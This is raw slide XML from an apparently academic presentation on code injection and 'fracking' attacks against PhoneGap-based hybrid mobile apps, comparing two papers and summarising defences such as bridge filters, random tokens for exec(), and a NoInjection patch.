              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000"/>
              <a:t>Solutions for paper 2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000" b="1"/>
              <a:t>Comparison between the two papers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000"/>
              <a:t>Conclusions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/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800" b="0"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3600" b="1"/>
              <a:t>When mobile meets web…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="569" name="Shape 569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320896" lvl="0" indent="-2320896">
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000"/>
              <a:t>Web attacker cannot execute his native code on the user’s device. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="2320896" lvl="0" indent="-2320896">
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000"/>
              <a:t>He can only execute scripts from third-parties, within iframe or in the data.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="2320896" lvl="0" indent="-2320896">
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000"/>
              <a:t>The scripts can be malicious.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/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800" b="0"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3600" b="1"/>
              <a:t>When mobile meets web…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="572" name="Table 572"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="488800" y="1508125"/>
          <a:ext cx="8179096" cy="334708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777883"/>
                <a:gridCol w="3067369"/>
                <a:gridCol w="3333844"/>
              </a:tblGrid>
              <a:tr h="656431">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="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>
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:sym typeface="Helvetica Neue"/>
                        </a:rPr>
                        <a:t>primary paper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>
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:sym typeface="Helvetica Neue"/>
                        </a:rPr>
                        <a:t>reference paper</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="63500" marR="63500" marT="63500" marB="63500" horzOverflow="overflow"/>
                </a:tc>
              </a:tr>
              <a:tr h="656431"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300" b="1" i="1">
                          <a:sym typeface="Helvetica Neue"/>
                        </a:rPr>
                        <a:t>Concentration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300" b="1">
                          <a:sym typeface="Helvetica Neue"/>
                        </a:rPr>
                        <a:t>Code injection attacks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300" b="1">
                          <a:sym typeface="Helvetica Neue"/>
                        </a:rPr>
                        <a:t>Origin-based Access Control</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="63500" marR="63500" marT="63500" marB="63500" horzOverflow="overflow"/>
                </a:tc>
              </a:tr>
              <a:tr h="656431"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300" b="1" i="1">
                          <a:sym typeface="Helvetica Neue"/>
                        </a:rPr>
                        <a:t>Vulnerability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300" b="1">
                          <a:sym typeface="Helvetica Neue"/>
                        </a:rPr>
                        <a:t>A number of unique channels can be used by Javascript to inject code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300" b="1">
                          <a:sym typeface="Helvetica Neue"/>
                        </a:rPr>
                        <a:t>Fracking: untrusted web content reach local resources on the device </a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="63500" marR="63500" marT="63500" marB="63500" horzOverflow="overflow"/>
                </a:tc>
              </a:tr>
              <a:tr h="656431"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300" b="1" i="1">
                          <a:sym typeface="Helvetica Neue"/>
                        </a:rPr>
                        <a:t>Challenge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300" b="1">
                          <a:sym typeface="Helvetica Neue"/>
                        </a:rPr>
                        <a:t>The developer do not know if there is any js code in their data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300" b="1">
                          <a:sym typeface="Helvetica Neue"/>
                        </a:rPr>
                        <a:t>Hybrid applications do not correctly compose the same origin policy and the access control policy </a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="63500" marR="63500" marT="63500" marB="63500" horzOverflow="overflow"/>
                </a:tc>
              </a:tr>
              <a:tr h="656431"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300" b="1" i="1">
                          <a:sym typeface="Helvetica Neue"/>
                        </a:rPr>
                        <a:t>Mitigation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300" b="1">
                          <a:sym typeface="Helvetica Neue"/>
                        </a:rPr>
                        <a:t>Add a filter inside the PhoneGap bridge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sz="1300" b="1">
                          <a:sym typeface="Helvetica Neue"/>
                        </a:rPr>
                        <a:t>Add a random token to the PhoneGap bridge to access local resources</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="63500" marR="63500" marT="63500" marB="63500" horzOverflow="overflow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/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800" b="0"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3600" b="1"/>
              <a:t>Outline</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="575" name="Shape 575"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="983298"/>
            <a:ext cx="8229600" cy="372570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spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000"/>
              <a:t>Background and motivation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000"/>
              <a:t>Overall problem definition and challenges</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000"/>
              <a:t>Related work</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000"/>
              <a:t>Solutions for paper 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000"/>
              <a:t>Solutions for paper 2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000"/>
              <a:t>Comparison between the two papers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000" b="1"/>
              <a:t>Conclusions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>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457199" y="528637"/>
            <a:ext cx="8229601" cy="8572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8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4617B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Conclusion</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="578" name="Shape 578"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457198" y="1451371"/>
            <a:ext cx="7951645" cy="3292082"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="34275" tIns="34275" rIns="34275" bIns="34275">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="449914" lvl="0" indent="-456264">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="95000"/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000">
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>Presented a systematic study of Code Injection Attacks on HTML5-based mobile Apps</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="114300">
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:pP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49914" lvl="0" indent="-456264">
              <a:buSzPct val="95000"/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000">
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>Designed and implemented a tool to automatic detect the vulnerabilities in HTML5-based mobile App</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="114300">
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:pP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marL="449914" lvl="0" indent="-456264">
              <a:buSzPct val="95000"/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000">
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>Implemented a prototype (NoInjection) as a patch to the PhoneGap framework in Android to mitigate the attack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>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457199" y="528637"/>
            <a:ext cx="8229601" cy="8572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8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4617B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Conclusion</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="581" name="Shape 581"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457198" y="1451371"/>
            <a:ext cx="7951645" cy="3292082"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="34275" tIns="34275" rIns="34275" bIns="34275">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="532483" lvl="0" indent="-537638" defTabSz="742309">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buSzPct val="95000"/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2376"/>
              <a:t>CB-5988: Allow the Android exec() to be used only by &lt;content&gt;'s domain</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="532483" lvl="0" indent="-537638" defTabSz="742309">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buSzPct val="95000"/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2376">
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>Add a random number to exec() to increase its security.</a:t>
            </a:r>
            <a:endParaRPr sz="1584">
              <a:latin typeface="Merriweather"/>
              <a:ea typeface="Merriweather"/>
              <a:cs typeface="Merriweather"/>
              <a:sym typeface="Merriweather"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="532483" lvl="0" indent="-537638" defTabSz="742309">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buSzPct val="95000"/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2376"/>
              <a:t>Use the domain of the &lt;content&gt; tag as the only one the native side will provide a token to. Both Android and iOS can know the URL of the main frame, and choose not to provide a token if the domain doesn't match that of content (with </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2376">
                <a:solidFill>
                  <a:srgbClr val="3B73AF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>file:///</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2376"/>
              <a:t> always being allowed).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457200" y="376236"/>
            <a:ext cx="8229600" cy="56808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457200">
              <a:defRPr sz="3500">
                <a:solidFill>
                  <a:srgbClr val="2E679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2E6795"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Architecture of a hybrid app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xfrm>
            <a:off x="457200" y="943373"/>
            <a:ext cx="8229600" cy="369212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92140" lvl="0" indent="-392140" defTabSz="457200">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="004E8A"/>
              </a:buClr>
              <a:buFont typeface="Times"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2200" b="1">
                <a:solidFill>
                  <a:srgbClr val="004E8A"/>
                </a:solidFill>
                <a:latin typeface="Times"/>
                <a:ea typeface="Times"/>
                <a:cs typeface="Times"/>
                <a:sym typeface="Times"/>
              </a:rPr>
              <a:t>Native container</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200">
                <a:solidFill>
                  <a:srgbClr val="004E8A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 sz="2500">
              <a:solidFill>
                <a:srgbClr val="004E8A"/>
              </a:solidFill>
              <a:latin typeface="Times"/>
              <a:ea typeface="Times"/>
              <a:cs typeface="Times"/>
              <a:sym typeface="Times"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="719666" lvl="1" indent="-338666" defTabSz="457200">
              <a:lnSpc>
                <a:spcPts val="1400"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="004E8A"/>
              </a:buClr>
              <a:buFont typeface="Times"/>
              <a:buChar char="✴"/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1900">
                <a:solidFill>
                  <a:srgbClr val="004E8A"/>
                </a:solidFill>
                <a:latin typeface="Times"/>
                <a:ea typeface="Times"/>
                <a:cs typeface="Times"/>
                <a:sym typeface="Times"/>
              </a:rPr>
              <a:t>Creates instance of UIWebView android.webkit.WebView / </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="004E8A"/>
                </a:solidFill>
                <a:latin typeface="Times"/>
                <a:ea typeface="Times"/>
                <a:cs typeface="Times"/>
                <a:sym typeface="Times"/>
              </a:rPr>
              <a:t>etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="719666" lvl="1" indent="-338666" defTabSz="457200">
              <a:lnSpc>
                <a:spcPts val="1400"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="004E8A"/>
              </a:buClr>
              <a:buFont typeface="Times"/>
              <a:buChar char="✴"/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1900">
                <a:solidFill>
                  <a:srgbClr val="004E8A"/>
                </a:solidFill>
                <a:latin typeface="Times"/>
                <a:ea typeface="Times"/>
                <a:cs typeface="Times"/>
                <a:sym typeface="Times"/>
              </a:rPr>
              <a:t>Navigates to main html file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="719666" lvl="1" indent="-338666" defTabSz="457200">
              <a:lnSpc>
                <a:spcPts val="1400"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="004E8A"/>
              </a:buClr>
              <a:buFont typeface="Times"/>
              <a:buChar char="✴"/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1900">
                <a:solidFill>
                  <a:srgbClr val="004E8A"/>
                </a:solidFill>
                <a:latin typeface="Times"/>
                <a:ea typeface="Times"/>
                <a:cs typeface="Times"/>
                <a:sym typeface="Times"/>
              </a:rPr>
              <a:t>Implements listener/handler for requests coming from JS code Activates </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="719666" lvl="1" indent="-338666" defTabSz="457200">
              <a:lnSpc>
                <a:spcPts val="1400"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="004E8A"/>
              </a:buClr>
              <a:buFont typeface="Times"/>
              <a:buChar char="✴"/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1900">
                <a:solidFill>
                  <a:srgbClr val="004E8A"/>
                </a:solidFill>
                <a:latin typeface="Times"/>
                <a:ea typeface="Times"/>
                <a:cs typeface="Times"/>
                <a:sym typeface="Times"/>
              </a:rPr>
              <a:t>JS code when necessary</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="338666" lvl="0" indent="-338666" defTabSz="457200">
              <a:lnSpc>
                <a:spcPts val="1400"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="004E8A"/>
              </a:buClr>
              <a:buFont typeface="Times"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1900" b="1">
                <a:solidFill>
                  <a:srgbClr val="004E8A"/>
                </a:solidFill>
                <a:latin typeface="Times"/>
                <a:ea typeface="Times"/>
                <a:cs typeface="Times"/>
                <a:sym typeface="Times"/>
              </a:rPr>
              <a:t>HTML5/CSS3/JS code:</a:t>
            </a:r>
            <a:endParaRPr sz="1900">
              <a:solidFill>
                <a:srgbClr val="004E8A"/>
              </a:solidFill>
              <a:latin typeface="Times"/>
              <a:ea typeface="Times"/>
              <a:cs typeface="Times"/>
              <a:sym typeface="Times"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="719666" lvl="1" indent="-338666" defTabSz="457200">
              <a:lnSpc>
                <a:spcPts val="1400"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="004E8A"/>
              </a:buClr>
              <a:buFont typeface="Times"/>
              <a:buChar char="✴"/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1900">
                <a:solidFill>
                  <a:srgbClr val="004E8A"/>
                </a:solidFill>
                <a:latin typeface="Times"/>
                <a:ea typeface="Times"/>
                <a:cs typeface="Times"/>
                <a:sym typeface="Times"/>
              </a:rPr>
              <a:t>Implements UI and app logic </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="719666" lvl="1" indent="-338666" defTabSz="457200">
              <a:lnSpc>
                <a:spcPts val="1400"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="004E8A"/>
              </a:buClr>
              <a:buFont typeface="Times"/>
              <a:buChar char="✴"/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1900">
                <a:solidFill>
                  <a:srgbClr val="004E8A"/>
                </a:solidFill>
                <a:latin typeface="Times"/>
                <a:ea typeface="Times"/>
                <a:cs typeface="Times"/>
                <a:sym typeface="Times"/>
              </a:rPr>
              <a:t>Activates native handlers through OS-specific mechanism (custom URL scheme) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="719666" lvl="1" indent="-338666" defTabSz="457200">
              <a:lnSpc>
                <a:spcPts val="1400"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="004E8A"/>
              </a:buClr>
              <a:buFont typeface="Times"/>
              <a:buChar char="✴"/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1900">
                <a:solidFill>
                  <a:srgbClr val="004E8A"/>
                </a:solidFill>
                <a:latin typeface="Times"/>
                <a:ea typeface="Times"/>
                <a:cs typeface="Times"/>
                <a:sym typeface="Times"/>
              </a:rPr>
              <a:t>Receives responses through JS handlers</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="1900">
                <a:solidFill>
                  <a:srgbClr val="004E8A"/>
                </a:solidFill>
                <a:latin typeface="Times"/>
                <a:ea typeface="Times"/>
                <a:cs typeface="Times"/>
                <a:sym typeface="Times"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr sz="1900" b="1">
                <a:solidFill>
                  <a:srgbClr val="004E8A"/>
                </a:solidFill>
                <a:latin typeface="Times"/>
                <a:ea typeface="Times"/>
                <a:cs typeface="Times"/>
                <a:sym typeface="Times"/>
              </a:rPr>
              <a:t>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858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idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1451373"/>
            <a:ext cx="8229600" cy="369212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7924800" y="4761703"/>
            <a:ext cx="762000" cy="1397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900">
                <a:solidFill>
                  <a:srgbClr val="045C75"/>
                </a:solidFill>
              </a:rPr>
              <a:t>8</a:t>
            </a:fld>
            <a:endParaRPr sz="900">
              <a:solidFill>
                <a:srgbClr val="045C75"/>
              </a:solidFill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456796" y="379994"/>
            <a:ext cx="8229601" cy="85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>
              <a:defRPr sz="38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04617B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HTML5-based Mobile App</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="175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94698" y="1508985"/>
            <a:ext cx="4865805" cy="3120827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/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1284514" y="2544065"/>
            <a:ext cx="2404075" cy="446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3000"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000"/>
              <a:t>Hybrid apps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xfrm>
            <a:off x="457200" y="566737"/>
            <a:ext cx="8229600" cy="56808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265174">
              <a:defRPr sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="2E679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2E6795"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Architecture of a hybrid app PhoneGap – Open Source Framework</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="179" name="Shape 179"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1362473"/>
            <a:ext cx="8229600" cy="369212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92140" lvl="0" indent="-392140" defTabSz="457200">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="004E8A"/>
              </a:buClr>
              <a:buFont typeface="Times"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2200">
                <a:solidFill>
                  <a:srgbClr val="004E8A"/>
                </a:solidFill>
                <a:latin typeface="Times"/>
                <a:ea typeface="Times"/>
                <a:cs typeface="Times"/>
                <a:sym typeface="Times"/>
              </a:rPr>
              <a:t>The de-facto standard for hybrid app development </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="392140" lvl="0" indent="-392140" defTabSz="457200">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="004E8A"/>
              </a:buClr>
              <a:buFont typeface="Times"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2200">
                <a:solidFill>
                  <a:srgbClr val="004E8A"/>
                </a:solidFill>
                <a:latin typeface="Times"/>
                <a:ea typeface="Times"/>
                <a:cs typeface="Times"/>
                <a:sym typeface="Times"/>
              </a:rPr>
              <a:t>Now in transition into becoming “Apache Callback” </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="392140" lvl="0" indent="-392140" defTabSz="457200">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="004E8A"/>
              </a:buClr>
              <a:buFont typeface="Times"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2200">
                <a:solidFill>
                  <a:srgbClr val="004E8A"/>
                </a:solidFill>
                <a:latin typeface="Times"/>
                <a:ea typeface="Times"/>
                <a:cs typeface="Times"/>
                <a:sym typeface="Times"/>
              </a:rPr>
              <a:t>Provides: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="719666" lvl="1" indent="-338666" defTabSz="457200">
              <a:lnSpc>
                <a:spcPts val="1400"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="004E8A"/>
              </a:buClr>
              <a:buFont typeface="Times"/>
              <a:buChar char="✴"/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1900">
                <a:solidFill>
                  <a:srgbClr val="004E8A"/>
                </a:solidFill>
                <a:latin typeface="Times"/>
                <a:ea typeface="Times"/>
                <a:cs typeface="Times"/>
                <a:sym typeface="Times"/>
              </a:rPr>
              <a:t>A template implementation for the native container </a:t>
            </a:r>
            <a:endParaRPr sz="1900" b="1">
              <a:solidFill>
                <a:srgbClr val="004E8A"/>
              </a:solidFill>
              <a:latin typeface="Times"/>
              <a:ea typeface="Times"/>
              <a:cs typeface="Times"/>
              <a:sym typeface="Times"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="719666" lvl="1" indent="-338666" defTabSz="457200">
              <a:lnSpc>
                <a:spcPts val="1400"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="004E8A"/>
              </a:buClr>
              <a:buFont typeface="Times"/>
              <a:buChar char="✴"/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1900">
                <a:solidFill>
                  <a:srgbClr val="004E8A"/>
                </a:solidFill>
                <a:latin typeface="Times"/>
                <a:ea typeface="Times"/>
                <a:cs typeface="Times"/>
                <a:sym typeface="Times"/>
              </a:rPr>
              <a:t>Implementation of the JS&lt;-&gt;Native bridge for 6 mobile OSs </a:t>
            </a:r>
            <a:endParaRPr sz="1900" b="1">
              <a:solidFill>
                <a:srgbClr val="004E8A"/>
              </a:solidFill>
              <a:latin typeface="Times"/>
              <a:ea typeface="Times"/>
              <a:cs typeface="Times"/>
              <a:sym typeface="Times"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="719666" lvl="1" indent="-338666" defTabSz="457200">
              <a:lnSpc>
                <a:spcPts val="1400"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="004E8A"/>
              </a:buClr>
              <a:buFont typeface="Times"/>
              <a:buChar char="✴"/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1900">
                <a:solidFill>
                  <a:srgbClr val="004E8A"/>
                </a:solidFill>
                <a:latin typeface="Times"/>
                <a:ea typeface="Times"/>
                <a:cs typeface="Times"/>
                <a:sym typeface="Times"/>
              </a:rPr>
              <a:t>OS-independent JS APIs for activating device functions </a:t>
            </a:r>
            <a:br>
              <a:rPr sz="1900">
                <a:solidFill>
                  <a:srgbClr val="004E8A"/>
                </a:solidFill>
                <a:latin typeface="Times"/>
                <a:ea typeface="Times"/>
                <a:cs typeface="Times"/>
                <a:sym typeface="Times"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr sz="1900" b="1">
                <a:solidFill>
